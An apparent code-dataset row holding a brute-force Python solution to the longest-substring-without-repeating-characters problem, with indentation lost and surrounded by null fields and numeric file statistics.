] | null | null | null | class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
if len(s) == 0:
return 0
m = 1
for _ in range(len(s)):
i = 0
S = set()
for x in range(_, len(s)):
if s[x] not in S:
S.add(s[x])
i += 1
else:
break
m = max(i, m)
return m | 23.947368 | 54 | 0.316484 | 455 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |